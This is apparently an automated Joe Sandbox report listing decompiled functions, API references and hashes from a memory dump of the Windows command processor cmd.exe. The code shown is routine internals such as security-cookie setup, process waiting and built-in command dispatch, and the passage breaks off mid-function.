Opcode ID: 17100edc1f9446ba401ae37f0bf228db1556fc225e77a7aea6deb63452443ba1
Instruction ID: f1f593b69786727770a09dd34e0a479de74dcbf15c6b89955159f8db3885d041
Opcode Fuzzy Hash: 17100edc1f9446ba401ae37f0bf228db1556fc225e77a7aea6deb63452443ba1
Instruction Fuzzy Hash: 7431DE79A443129FDF21AF68EC09A297BA2EB06724F144429F502D7BE0DB30D945CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D97513, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D97513() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xdad0b4; // 0x35c4fbb8
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xdad0b4 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xdad0b4 = _t39;
				}
				_t37 =  !_t36;
				 *0xdad0b8 = _t37;
				return _t37;
			}

0x00d9751b
0x00d9751f
0x00d97523
0x00d97536
0x00d97540
0x00d9754c
0x00d97555
0x00d9755e
0x00d9756f
0x00d97576
0x00d97582
0x00d97585
0x00d97589
0x00d97593
0x00d97598
0x00d97598
0x00d9759a
0x00d9759a
0x00d975a0
0x00d975a3
0x00d975ac

APIs

GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 00D97540
GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D9754F
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00D97558
GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00D97561
QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 00D97576

Strings

`jcw, xrefs: 00D97576

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID: `jcw
API String ID: 1445889803-3751000594
Opcode ID: 716c4682de5ef959234f111cba847c44c1da5d05fd156ac343e43698d033e159
Instruction ID: a1862aa511371d237ec88d21dcf5a1e5c1d8174a5657e5fede20f5d6332ca34e
Opcode Fuzzy Hash: 716c4682de5ef959234f111cba847c44c1da5d05fd156ac343e43698d033e159
Instruction Fuzzy Hash: 03114C71D1520AEBCF10DBB8DA58A9EF7F5FF48310F9548A6D406E7310E7309A018B64

Uniqueness

Uniqueness Score: -1.00%

Function 00D94C3E, Relevance: 10.5, APIs: 7, Instructions: 42
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00D94C3E() {
				long _v8;
				int _t8;
				void* _t15;
				void* _t18;

				_push(_t15);
				_v8 = _v8 | 0xffffffff;
				_t18 = _t15;
				 *0xdad0db = 0;
				WaitForSingleObject(_t18, 0xffffffff);
				_t8 = GetExitCodeProcess(_t18,  &_v8);
				if(_v8 == 0xc000013a) {
					EnterCriticalSection( *0xdb3858);
					 *0xdad544 = 1;
					LeaveCriticalSection( *0xdb3858);
					fflush(E00D97721(fprintf(E00D97721(_t8, 2), "^C"), 2));
				}
				 *0xdad0db = 1;
				CloseHandle(_t18);
				return _v8;
			}

0x00d94c43
0x00d94c44
0x00d94c49
0x00d94c4b
0x00d94c55
0x00d94c60
0x00d94c6d
0x00d9ee57
0x00d9ee63
0x00d9ee6d
0x00d9ee8f
0x00d9ee95
0x00d94c74
0x00d94c7b
0x00d94c88

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,000000FF,00000000,?,?,00DA7929,00000000,00DA9313,00000000,00000000,?,00D99814,00000000), ref: 00D94C55
GetExitCodeProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,000000FF,?,00DA7929,00000000,00DA9313,00000000,00000000,?,00D99814,00000000), ref: 00D94C60
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,00DA7929,00000000,00DA9313,00000000,00000000,?,00D99814,00000000), ref: 00D94C7B
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00DA7929,00000000,00DA9313,00000000,00000000,?,00D99814,00000000), ref: 00D9EE57
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00DA7929,00000000,00DA9313,00000000,00000000,?,00D99814,00000000), ref: 00D9EE6D
fprintf.MSVCRT ref: 00D9EE81
fflush.MSVCRT ref: 00D9EE8F

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: CriticalSection$CloseCodeEnterExitHandleLeaveObjectProcessSingleWaitfflushfprintf
String ID:
API String ID: 4271573189-0
Opcode ID: c4b01877157b920e6f65e26086da8452a2ae353bbb20afda450d33ea9164f0bd
Instruction ID: c163715a37d8daa781469919ec6166b2459405446df123a4e96ecd09fbb10954
Opcode Fuzzy Hash: c4b01877157b920e6f65e26086da8452a2ae353bbb20afda450d33ea9164f0bd
Instruction Fuzzy Hash: 1A017C31405346FFDF00ABA8AC0DE99BBADEB06321F100246F499D23B1CBB00A019B76

Uniqueness

Uniqueness Score: -1.00%

Function 00D907C0, Relevance: 9.4, APIs: 6, Instructions: 361
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00D907C0(void* __ebx, long __ecx, intOrPtr _a4) {
				intOrPtr _v0;
				void* _v4;
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				signed int _v32;
				short _v564;
				char _v576;
				char* _v580;
				char _v1100;
				void* _v1104;
				long _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr* _v1120;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				signed int _t71;
				int _t75;
				long _t78;
				signed short* _t81;
				signed short _t90;
				intOrPtr* _t91;
				short* _t96;
				char* _t97;
				intOrPtr _t100;
				intOrPtr _t103;
				wchar_t* _t104;
				long _t107;
				signed int _t108;
				signed char _t120;
				long _t121;
				wchar_t* _t126;
				int _t127;
				void* _t129;
				wchar_t* _t130;
				signed short* _t141;
				wchar_t* _t158;
				wchar_t* _t163;
				signed int _t167;
				signed int _t171;
				long _t175;
				void* _t176;
				signed int _t179;
				void* _t180;
				void* _t184;
				void* _t186;
				signed int _t187;
				int _t188;
				signed int _t189;
				intOrPtr* _t190;
				intOrPtr* _t191;
				signed int _t193;
				void* _t194;
				void* _t196;
				signed int _t197;
				void* _t199;
				void* _t200;

				_push(0xfffffffe);
				_push(0xdabd98);
				_push(E00D97290);
				_push( *[fs:0x0]);
				_t200 = _t199 - 0x450;
				_t70 =  *0xdad0b4; // 0x35c4fbb8
				_v12 = _v12 ^ _t70;
				_t71 = _t70 ^ _t197;
				_v32 = _t71;
				_push(__ebx);
				_push(_t71);
				 *[fs:0x0] =  &_v20;
				_t175 = __ecx;
				_v1108 = __ecx;
				_v1112 = 0;
				GetConsoleTitleW( &_v564, 0x104);
				if( *(_t175 + 0x38) == 0) {
					L88:
					_t75 = 1;
					goto L44;
				} else {
					E00D90D51( &_v1100);
					if(_v576 == 0) {
						_t78 = 0x104;
					} else {
						_t78 = 0x7fe7;
					}
					if(E00D90C70( &_v1100, _t78) < 0) {
						L87:
						E00D90DE8(_t79,  &_v1100);
						goto L88;
					} else {
						_t81 =  *(_t175 + 0x38);
						if(_t81[1] == 0x3a) {
							_t140 =  *_t81;
							if(E00D929BB( *_t81) == 0) {
								_push(0);
								_push(0xf);
								goto L83;
							} else {
								_t140 =  *( *(_t175 + 0x38));
								if(E00D96A96( *( *(_t175 + 0x38))) != 0) {
									_push(0);
									_push(GetLastError());
									L83:
									_t79 = E00D8C5A2(_t140);
									goto L86;
								} else {
									_t187 = towupper( *( *(_t175 + 0x38)) & 0x0000ffff) - 0x00000040 & 0x0000ffff;
									_t141 =  *(_t175 + 0x38);
									_t55 =  &(_t141[1]); // 0x2
									_t169 = _t55;
									do {
										_t90 =  *_t141;
										_t141 =  &(_t141[1]);
									} while (_t90 != 0);
									if(_t141 - _t169 >> 1 == 2) {
										_t91 = E00DA93E2(_t187, _t169);
										goto L90;
									} else {
										goto L65;
									}
								}
							}
							goto L44;
						} else {
							_t169 =  &_v1104;
							_t189 = E00D8E040(_t175,  &_v1104);
							_v1116 = _t189;
							if(_t189 == 0xffffffff) {
								L65:
								_t188 = E00D8C7AA(_t175);
								goto L43;
							} else {
								if(_t189 == 0xfffffffe) {
									goto L87;
								} else {
									_t91 =  *((intOrPtr*)(0xd81624 + (_t189 + _t189 * 2) * 8));
									_v1120 = _t91;
									if(_t91 == 0) {
										L90:
										E00D90DE8(_t91,  &_v1100);
										_t75 = 0;
										goto L44;
									} else {
										_t96 = _v580;
										if(_t96 == 0) {
											_t96 =  &_v1100;
										}
										 *_t96 = 0x2f;
										_t97 = _v580;
										if(_t97 == 0) {
											_t97 =  &_v1100;
										}
										 *((short*)(_t97 + 2)) = 0;
										if(_v580 == 0) {
											_t169 =  &_v1100;
										}
										_t130 = E00D8EA40( *((intOrPtr*)(_t175 + 0x3c)), _t169, 2);
										if(_t189 == 0xa) {
											if(_t130 == 0) {
												goto L12;
											} else {
												_t127 = wcsncmp(_t130, "/", 4);
												_t200 = _t200 + 0xc;
												if(_t127 != 0) {
													goto L14;
												} else {
													goto L12;
												}
											}
										} else {
											L12:
											if(_t189 == 0x1f) {
												L14:
												if(_t130 == 0) {
													L34:
													if(E00D8E340(_t175) != 0) {
														E00D9100C(_t99, _t99);
													}
													_v8 = 0;
													_t190 = _v1120;
													_push(_t175);
													if(_t190 == E00D85F50) {
														_t100 = E00D85F50();
													} else {
														if(_t190 == E00D86980) {
															_t100 = E00D86980();
														} else {
															if(_t190 == E00D92360) {
																_t100 = E00D92360();
															} else {
																if(_t190 != E00D89410) {
																	if(_t190 == E00D951B0) {
																		_t100 = E00D951B0();
																	} else {
																		 *0xdc94b4();
																		_t100 =  *_t190();
																	}
																} else {
																	_t100 = E00D89410();
																}
															}
														}
													}
													_t188 = _t100;
													_v1112 = _t188;
													_v8 = 0xfffffffe;
													_t93 = E00D90BDF(_t100);
													L43:
													E00D90DE8(_t93,  &_v1100);
													_t75 = _t188;
													L44:
													 *[fs:0x0] = _v20;
													_pop(_t176);
													_pop(_t186);
													_pop(_t129);
													return E00D96FD0(_t75, _t129, _v32 ^ _t197, _t169, _t176, _t186);
												} else {
													while( *_t130 != 0) {
														do {
															_t103 =  *_t191;
															_t191 = _t191 + 2;
														} while (_t103 != 0);
														_t193 = _t191 - _t155 >> 1;
														_t104 = wcschr(_t130, 0x22);
														_t200 = _t200 + 8;
														if(_t104 != 0) {
															memset(0xdc3f10, 0, 0x1000 << 2);
															_t200 = _t200 + 0xc;
															_t158 = _t130;
															_t46 =  &(_t158[0]); // 0x2
															_t171 = _t46;
															do {
																_t107 =  *_t158;
																_t158 =  &(_t158[0]);
															} while (_t107 != 0);
															_t155 = _t158 - _t171 >> 1;
															_t179 = 0;
															_t108 = 0;
															if(_t155 > 0) {
																do {
																	_t171 =  *(_t130 + _t108 * 2) & 0x0000ffff;
																	if(_t171 != 0x22) {
																		 *(0xdc3f10 + _t179 * 2) = _t171;
																		_t179 = _t179 + 1;
																	}
																	_t108 = _t108 + 1;
																} while (_t108 < _t155);
															}
															_t180 = _t179 + _t179;
															if(_t180 >= 0x4000) {
																E00D9711D(_t108, _t130, _t155, _t171, _t180, _t193);
																_push(_t197);
																_push(_t193);
																_push(_t180);
																_t194 = E00D90C70(0xdc3ab0, ((0 |  *0xdc3cbc != 0x00000000) - 0x00000001 & 0xffff811d) + 0x7fe7);
																if(_t194 < 0) {
																	_push(_t194);
																	_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																	_push(0x36);
																	goto L101;
																} else {
																	_t162 =  *0xdc3cb8;
																	if( *0xdc3cb8 == 0) {
																		_t162 = 0xdc3ab0;
																	}
																	_t194 = E00D96826(_t162,  *0xdc3cc0, _v0, _a4);
																	if(_t194 < 0) {
																		_push(_t194);
																		_push("onecore\\base\\cmd\\maxpathawarestring.cpp");
																		_push(0x37);
																		L101:
																		E00DA292C();
																	}
																}
																return _t194;
															} else {
																 *((short*)(_t180 + 0xdc3f10)) = 0;
																_t169 = 0xdc3f10;
																goto L20;
															}
														} else {
															_t169 = _t130;
															L20:
															_t196 = _t193 + 1;
															if(_t196 == 0 || _t196 > 0x7fffffff) {
																if(_t196 != 0) {
																	 *_t130 = 0;
																}
															} else {
																_t126 = _t130;
																_t184 = 0x7ffffffe - _t196;
																_t169 = _t169 - _t130;
																while(_t184 + _t196 != 0) {
																	_t167 =  *(_t169 + _t126) & 0x0000ffff;
																	if(_t167 != 0) {
																		 *_t126 = _t167;
																		_t126 =  &(_t126[0]);
																		_t196 = _t196 - 1;
																		if(_t196 != 0) {
																			continue;
																		}
																	}
																	break;
																}
																if(_t196 == 0) {
																	_t126 = _t126 - 2;
																}
																_t155 = 0;
																 *_t126 = 0;
															}
															_t120 = _v1104;
															if((_t120 & 0x00000001) != 0) {
																if(_t130[0] != 0x3a) {
																	goto L29;
																} else {
																	_t155 =  *_t130;
																	if(E00D929BB( *_t130) == 0) {
																		_push(0);
																		_push(0xf);
																		goto L85;
																	} else {
																		if(_v1116 == 4) {
																			L71:
																			_t120 = _v1104;
																			goto L29;
																		} else {
																			_t155 =  *_t130;
																			if(E00D96A96( *_t130) != 0) {
																				_push(0);
																				_push(GetLastError());
																				goto L85;
																			} else {
																				goto L71;
																			}
																		}
																	}
																}
															} else {
																L29:
																if((_t120 & 0x00000002) != 0) {
																	if( *_t130 != 0x2f) {
																		goto L30;
																	} else {
																		_push(0);
																		_push(0x232a);
																		L85:
																		_t79 = E00D8C5A2(_t155);
																		 *0xdbb8b0 = 1;
																		L86:
																		goto L87;
																	}
																} else {
																	L30:
																	_t163 = _t130;
																	_t34 =  &(_t163[0]); // 0x2
																	_t169 = _t34;
																	do {
																		_t121 =  *_t163;
																		_t163 =  &(_t163[0]);
																	} while (_t121 != 0);
																	_t130 = _t130 + (_t163 - _t169 >> 1) * 2 + 2;
																	if(_t130 != 0) {
																		continue;
																	} else {
																		break;
																	}
																}
															}
														}
														goto L102;
													}
													_t175 = _v1108;
													goto L34;
												}
											} else {
												_t169 = _t130;
												if(E00D8DD2C(_t189, _t130, 1) != 0) {
													goto L87;
												} else {
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L102:
			}

0x00d907c5
0x00d907c7
0x00d907cc
0x00d907d7
0x00d907d8
0x00d907de
0x00d907e3
0x00d907e6
0x00d907e8
0x00d907eb
0x00d907ee
0x00d907f2
0x00d907f8
0x00d907fa
0x00d90800
0x00d90816
0x00d90820
0x00d9cc7e
0x00d9cc7e
0x00000000
0x00d90826
0x00d9082c
0x00d90838
0x00d9cc3d
0x00d9083e
0x00d9083e
0x00d9083e
0x00d90851
0x00d9cc73
0x00d9cc79
0x00000000
0x00d90857
0x00d90857
0x00d9085f
0x00d90b1a
0x00d90b24
0x00d9cc47
0x00d9cc49
0x00000000
0x00d90b2a
0x00d90b2d
0x00d90b37
0x00d9cc4d
0x00d9cc55
0x00d9cc56
0x00d9cc56
0x00000000
0x00d90b3d
0x00d90b51
0x00d90b54
0x00d90b57
0x00d90b57
0x00d90b60
0x00d90b60
0x00d90b63
0x00d90b66
0x00d90b72
0x00d9cc8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00d90b72
0x00d90b37
0x00000000
0x00d90865
0x00d90865
0x00d90872
0x00d90874
0x00d9087d
0x00d90b78
0x00d90b7f
0x00000000
0x00d90883
0x00d90886
0x00000000
0x00d9088c
0x00d9088f
0x00d90896
0x00d9089e
0x00d9cc8f
0x00d9cc95
0x00d9cc9a
0x00000000
0x00d908a4
0x00d908a4
0x00d908ac
0x00d9cca1
0x00d9cca1
0x00d908b7
0x00d908ba
0x00d908c2
0x00d9ccac
0x00d9ccac
0x00d908ca
0x00d908d6
0x00d9ccb7
0x00d9ccb7
0x00d908e6
0x00d908eb
0x00d90a68
0x00000000
0x00d90a6e
0x00d90a76
0x00d90a7c
0x00d90a81
0x00000000
0x00d90a87
0x00000000
0x00d90a87
0x00d90a81
0x00d908f1
0x00d908f1
0x00d908f4
0x00d90909
0x00d9090b
0x00d909d1
0x00d909da
0x00d909de
0x00d909de
0x00d909e3
0x00d909ea
0x00d909f0
0x00d909f7
0x00d90a24
0x00d909f9
0x00d909ff
0x00d90aef
0x00d90a05
0x00d90a0b
0x00d90af9
0x00d90a11
0x00d90a17
0x00d90b09
0x00d90b86
0x00d90b0b
0x00d90b0d
0x00d90b13
0x00d90b13
0x00d90a1d
0x00d90a1d
0x00d90a1d
0x00d90a17
0x00d90a0b
0x00d909ff
0x00d90a29
0x00d90a2b
0x00d90a31
0x00d90a38
0x00d90a3d
0x00d90a43
0x00d90a48
0x00d90a4a
0x00d90a4d
0x00d90a55
0x00d90a56
0x00d90a57
0x00d90a65
0x00d90911
0x00d90911
0x00d90920
0x00d90920
0x00d90923
0x00d90926
0x00d9092d
0x00d90932
0x00d90938
0x00d9093d
0x00d90a98
0x00d90a98
0x00d90a9a
0x00d90a9c
0x00d90a9c
0x00d90aa0
0x00d90aa0
0x00d90aa3
0x00d90aa6
0x00d90aad
0x00d90aaf
0x00d90ab1
0x00d90ab5
0x00d90ab7
0x00d90ab7
0x00d90abe
0x00d90ac0
0x00d90ac8
0x00d90ac8
0x00d90ac9
0x00d90aca
0x00d90ab7
0x00d90ace
0x00d90ad6
0x00d90bf7
0x00d90bfe
0x00d90c09
0x00d90c0e
0x00d90c26
0x00d90c2a
0x00d9cd24
0x00d9cd25
0x00d9cd2a
0x00000000
0x00d90c30
0x00d90c30
0x00d90c38
0x00d90c5d
0x00d90c5d
0x00d90c4b
0x00d90c4f
0x00d9cd2e
0x00d9cd2f
0x00d9cd34
0x00d9cd36
0x00d9cd3a
0x00d9cd3a
0x00d90c4f
0x00d90c5a
0x00d90adc
0x00d90ade
0x00d90ae5
0x00000000
0x00d90ae5
0x00d90943
0x00d90943
0x00d90945
0x00d90945
0x00d90948
0x00d9cccc
0x00d9ccd4
0x00d9ccd4
0x00d9095a
0x00d9095a
0x00d90961
0x00d90963
0x00d90965
0x00d9096c
0x00d90973
0x00d90975
0x00d90978
0x00d9097b
0x00d9097e
0x00000000
0x00000000
0x00d9097e
0x00000000
0x00d90973
0x00d90982
0x00d9ccc2
0x00d9ccc2
0x00d90988
0x00d9098a
0x00d9098a
0x00d9098d
0x00d90996
0x00d90b95
0x00000000
0x00d90b9b
0x00d90b9b
0x00d90ba5
0x00d9cc5d
0x00d9cc5f
0x00000000
0x00d90bab
0x00d90bb2
0x00d90bc4
0x00d90bc4
0x00000000
0x00d90bb4
0x00d90bb4
0x00d90bbe
0x00d9ccdc
0x00d9cce4
0x00000000
0x00000000
0x00000000
0x00000000
0x00d90bbe
0x00d90bb2
0x00d90ba5
0x00d9099c
0x00d9099c
0x00d9099e
0x00d90bd4
0x00000000
0x00d90bda
0x00d9ccea
0x00d9ccec
0x00d9cc61
0x00d9cc61
0x00d9cc66
0x00d9cc70
0x00000000
0x00d9cc70
0x00d909a4
0x00d909a4
0x00d909a4
0x00d909a6
0x00d909a6
0x00d909b0
0x00d909b0
0x00d909b3
0x00d909b6
0x00d909c2
0x00d909c5
0x00000000
0x00000000
0x00000000
0x00000000
0x00d909c5
0x00d9099e
0x00d90996
0x00000000
0x00d9093d
0x00d909cb
0x00000000
0x00d909cb
0x00d908f6
0x00d908f8
0x00d90903
0x00000000
0x00000000
0x00000000
0x00000000
0x00d90903
0x00d908f4
0x00d908eb
0x00d9089e
0x00d90886
0x00d9087d
0x00d9085f
0x00d90851
0x00000000

APIs

GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0(?,00000104,35C4FBB8,00000001,?), ref: 00D90816

Part of subcall function 00D90D51: memset.MSVCRT ref: 00D90D7D

Part of subcall function 00D90C70: ??_V@YAXPAX@Z.MSVCRT ref: 00D90CBA
Part of subcall function 00D90C70: memset.MSVCRT ref: 00D90CDD

towupper.MSVCRT ref: 00D90B44

Part of subcall function 00D8E040: memset.MSVCRT ref: 00D8E090
Part of subcall function 00D8E040: wcschr.MSVCRT ref: 00D8E0F3
Part of subcall function 00D8E040: wcschr.MSVCRT ref: 00D8E10B
Part of subcall function 00D8E040: _wcsicmp.MSVCRT ref: 00D8E179

wcschr.MSVCRT ref: 00D90932
wcsncmp.MSVCRT(00000000,00D8218C,00000004,00000002,00007FE7), ref: 00D90A76

Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EAB7
Part of subcall function 00D8EA40: iswspace.MSVCRT ref: 00D8EB2D
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB49
Part of subcall function 00D8EA40: wcschr.MSVCRT ref: 00D8EB6D

Part of subcall function 00D86980: _get_osfhandle.MSVCRT ref: 00D86A06
Part of subcall function 00D86980: GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D86A10
Part of subcall function 00D86980: _wcsnicmp.MSVCRT ref: 00D86A3D
Part of subcall function 00D86980: _get_osfhandle.MSVCRT ref: 00D86A64
Part of subcall function 00D86980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D86A6E
Part of subcall function 00D86980: _get_osfhandle.MSVCRT ref: 00D86A8E
Part of subcall function 00D86980: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00D86AA0
Part of subcall function 00D86980: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00D86AC0
Part of subcall function 00D86980: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00D86AD1
Part of subcall function 00D86980: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00DAD620,00000200,00000000,00000000), ref: 00D86AE7
Part of subcall function 00D86980: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DC7F20), ref: 00D86AF4

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00D9CCDE

Memory Dump Source

Source File: 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp, Offset: 00D80000, based on PE: true

Associated: 00000011.00000002.543090627.0000000000DC9000.00000040.00020000.sdmp Download File
Associated: 00000011.00000002.543136845.0000000000DCD000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_d80000_cmd.jbxd

Similarity

API ID: wcschr$File$_get_osfhandlememset$LockPointerShared$AcquireConsoleErrorLastReadReleaseSizeTitleType_wcsicmp_wcsnicmpiswspacetowupperwcsncmp
String ID:
API String ID: 1803274588-0
Opcode ID: a851df3e397c29315fcabb00f61fb08cdeaff47f40d6d15028ef26404bec75c6
Instruction ID: 0e5f1aa7520fc9406ccbbc8f28faf0ab1403abf8fa52d64474c25103be730187
Opcode Fuzzy Hash: a851df3e397c29315fcabb00f61fb08cdeaff47f40d6d15028ef26404bec75c6
Instruction Fuzzy Hash: 13C14831A003169FDF24AB28EC95BBE7BA4EF40304F0C4568E94A97291EB70DD45CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 00D94800, Relevance: 9.3, APIs: 6, Instructions: 327
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00D94800(signed int __ecx, signed int __edx) {
				intOrPtr _v8;
				signed int _v16;
				int _v28;
				char _v32;
				void* _v36;
				void _v556;
				int _v564;
				char _v568;
				void* _v572;
				void _v1092;
				char _v1093;
				signed int _v1094;
				signed int* _v1100;
				signed int _v1104;
				signed int* _v1108;
				intOrPtr _v1112;
				signed int _v1116;
				intOrPtr _v1120;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t106;
				intOrPtr _t123;
				intOrPtr _t127;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t135;
				void* _t136;
				signed int _t137;
				intOrPtr _t138;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr* _t146;
				intOrPtr _t147;
				void* _t148;
				signed int _t153;
				signed int _t154;
				void* _t163;
				intOrPtr* _t164;
				intOrPtr* _t167;
				intOrPtr* _t170;
				signed int _t176;
				signed int* _t177;
				void* _t178;
				intOrPtr* _t186;
				void* _t190;
				signed int _t192;
				signed int _t196;
				void* _t198;
				intOrPtr* _t200;
				void* _t201;
				void* _t202;
				intOrPtr _t203;
				intOrPtr* _t204;
				signed int* _t205;
				signed int _t206;
				signed int _t211;

				_t191 = __edx;
				_t154 = _t211;
				_push(__ecx);
				_push(__ecx);
				_v8 =  *((intOrPtr*)(_t154 + 4));
				_t209 = (_t211 & 0xfffffff8) + 4;
				_t106 =  *0xdad0b4; // 0x35c4fbb8
				_v16 = _t106 ^ (_t211 & 0xfffffff8) + 0x00000004;
				_t200 =  *((intOrPtr*)(_t154 + 0xc));
				_t196 = 0;
				_v564 = 0x104;
				_v1093 = __edx;
				_v1116 = __ecx;
				 *0xdc3cf0 = 0;
				_v572 = 0;
				_v568 = 1;
				memset( &_v1092, 0, 0x104);
				_v36 = 0;
				_v32 = 1;
				_v28 = 0x104;
				memset( &_v556, 0, 0x104);
				_t156 =  &_v1092;
				if(E00D90C70( &_v1092, 0x7fe9) < 0) {
					L74:
					if(_v1093 == 0) {
						L14:
						_t196 = 1;
						L15:
						__imp__??_V@YAXPAX@Z(_v36);
						__imp__??_V@YAXPAX@Z(_v572);
						_pop(_t198);
						_pop(_t201);
						return E00D96FD0(_t196, _t154, _v16 ^ _t209, _t191, _t198, _t201);
					}
					_push(_t196);
					_push(0x2374);
					L13:
					E00D8C5A2(_t156);
					goto L14;
				}
				_t156 =  &_v556;
				if(E00D90C70( &_v556, 0x7fe9) < 0) {
					goto L74;
				}
				_t163 = 0x30;
				_t164 = E00D900B0(_t163);
				_v1108 = _t164;
				if(_t164 == 0) {
					L47:
					E00DA9287(_t164);
					__imp__longjmp(0xdbb8b8, 1);
					L48:
					_t165 = 0xdc3ab0;
					L17:
					E00D90D89(_t191, _t165);
					E00D95D39();
					_t202 = _v572;
					_t167 = _t202;
					if(_t202 == 0) {
						_t167 =  &_v1092;
					}
					_t191 = _t167 + 2;
					do {
						_t123 =  *_t167;
						_t167 = _t167 + 2;
					} while (_t123 != _t196);
					_t156 = _t167 - _t191 >> 1;
					_v1104 = _t156;
					if(_t156 <= 3) {
						L24:
						if(_t156 + 1 > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(2);
							goto L13;
						}
						_t203 = _v1120;
						_t125 =  *(_t203 + 0x10);
						if( *( *(_t203 + 0x10)) == _t196) {
							_t125 = "*";
						}
						E00D90D89(_t191, _t125);
						_t170 = _v36;
						if(_t170 == 0) {
							_t170 =  &_v556;
						}
						_t191 = _t170 + 2;
						do {
							_t127 =  *_t170;
							_t170 = _t170 + 2;
						} while (_t127 != _t196);
						_t156 = _t170 - _t191 >> 1;
						if(_v1104 + 1 + (_t170 - _t191 >> 1) > 0x7fe7) {
							if(_v1093 == 0) {
								goto L14;
							}
							_push(_t196);
							_push(0x6f);
							goto L13;
						}
						if( *( *(_t203 + 0x10)) == _t196) {
							L33:
							_t172 = _v36;
							if(_v36 == 0) {
								_t172 =  &_v556;
							}
							_t132 = E00D9297B(_t172);
							_t204 = _v1100;
							 *_t204 = _t132;
							_t173 = _v572;
							if(_v572 == 0) {
								_t173 =  &_v1092;
							}
							_t133 = E00D9297B(_t173);
							 *((intOrPtr*)(_t204 + 4)) = _t133;
							_t205 = _v1108;
							if(_t205[1] != _t196) {
								__imp___wcsicmp(_t205[1], _t133);
								if(_t133 == 0) {
									_t205[2] = _t205[2] + 1;
									_t176 = _v1100;
									goto L38;
								}
								_t164 = 0x30;
								_t205 = E00D900B0(_t164);
								if(_t205 == 0) {
									goto L47;
								}
								_v1108 = _t205;
								 *_v1108 = _t205;
								_t143 = E00D9297B(_v1100[1]);
								_t176 = _v1100;
								_t205[1] = _t143;
								 *_t205 = _t196;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								_t205[2] = 1;
								goto L37;
							} else {
								_t145 = E00D9297B(_t133);
								_t176 = _v1100;
								_t205[1] = _t145;
								_t144 =  *((intOrPtr*)(_t176 + 8));
								L37:
								_t205[3] = _t176;
								_t205[4] = _t144;
								L38:
								_t191 = _v1116;
								_t135 = _v1112 + 1;
